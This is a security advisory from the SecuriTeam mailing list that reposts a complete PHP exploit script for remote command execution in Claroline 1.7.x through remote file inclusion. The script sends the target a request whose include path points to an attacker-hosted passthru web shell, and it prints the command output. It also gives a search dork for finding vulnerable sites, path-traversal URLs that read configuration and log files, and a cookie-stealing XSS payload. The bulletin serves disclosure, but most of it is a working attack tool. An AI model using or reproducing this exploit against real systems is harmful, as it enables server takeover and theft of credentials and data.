[EXPL] Claroline Remote Code Execution (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Claroline Remote Code Execution (Exploit)
------------------------------------------------------------------------


SUMMARY

" <http://www.claroline.net/> Claroline is a free application based on
PHP/MySQL allowing teachers or education organizations to create and
administrate courses through the web."

Improper handling of user input allows attackers to execute arbitrary code
in Claroline.

DETAILS

Vulnerable Systems:
* Claroline version 1.7.6 and prior

Exploit:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Claroline <= 1.7.4 \"scormExport.inc.php\" remote cmmnds xctn\r\n";
echo "by rgod rgod at autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";;
echo "-> works with register_globals = On & allow_url_fopen = On\r\n\r\n";
echo "dork: \"Powered by Claroline\" -demo\r\n\r\n";

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path location OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to claroline\r\n";
echo "location: arbitrary location with the code to include\r\n";
echo "Options:\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com ls
-la\r\n";
echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com cat
/..\r\n";
echo "/../inc/conf/claro_main.conf.php -p81\r\n";
echo "php ".$argv[0]." target.com / http://evilsite.com uname -a
-P1.1.1.1:80\r\n\r\n";
echo "note, on remote location you need a\r\n";
echo "/lib/fileUpload.lib.php/index.html\r\n";
echo "or a\r\n";
echo "/lib/pclzip/pclzip.lib.php/index.html\r\n";
echo "with this code inside:\r\n\r\n";
echo "<?php\r\n";
echo 'if
(get_magic_quotes_gpc()){$_GET[cmd]=strisplashes($_GET[cmd]);}'."\r\n";
echo "error_reporting(0);\r\n";
echo 'ini_set("max_execution_time",0);'."\r\n";
echo 'echo "*delim*";'."\r\n";
echo 'passthru($_GET[cmd]);'."\r\n";
echo 'echo "*delim*";'."\r\n";
echo "die;\r\n";
echo '?>'."\r\n";
die;
}

/*
explaination:
software site: http://www.claroline.net/
description: Claroline is a free application based on PHP/MySQL
allowing
teachers or education organizations to create and
administrate
courses through the web.

vulnerabilities:

i) system disclosure:
without to have an account you can see (not modify or include) all files
on target system
regardless of any php.ini settings, ex:


http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=/../../../../apache/logs/error.log

http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=/../../claroline/inc/conf/claro_main.conf.php
(see inside html for this)

ii) xss & full path disclosure:

http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=";><script>alert(document.cookie)</script>

iii) and finally, arbitrary remote inclusion / remote commands
execution:

iii.a)if register_globals = On & allow_url_fopen = On:

http://[target]/[path_to_claroline]/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=http://evil.site.com
where on:
http://evil.site.com/lib/fileUpload.lib.php/index.html
or:
http://evil.site.com/lib/pclzip/pclzip.lib.php/index.html
you have some php code

iii.b)if register_globals = On & magic_quotes_gpc = Off:

http://[target]/[path_to_claroline]/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=/../../../../apache/logs/access.log%00
(after you have injected some code in Apache log files and braking the
path
through a null char)

this is the exploit for iii.a)
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}

$host=$argv[1];$path=$argv[2];$location=$argv[3];$cmd='';
if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
{die("Check the path, it must begin and end with a trailing slash\r\n");}
$port=80;$proxy="";
for ($i=4; $i<=$argc-1; $i++)
{
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}

$packet ="GET ".$p."claroline/learnPath/include/scormExport.inc.php";
$packet.="?cmd=".urlencode($cmd)."&includePath=".urlencode($location)."
HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
#debug
#echo quick_dump($packet);
sendpacketii($packet);
if (strstr($html,"*delim*"))
{
echo "Exploit succeeded...\r\n\r\n";
$temp=explode("*delim*",$html);
echo $temp[1];
}
else
{echo "Exploit failed...";}
?>


ADDITIONAL INFORMATION

The information has been provided by <mailto:rgod@xxxxxxxxxxxxx> rgod.
The original article can be found at:
<http://retrogod.altervista.org/claroline_174_incl_xpl.html>
http://retrogod.altervista.org/claroline_174_incl_xpl.html



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages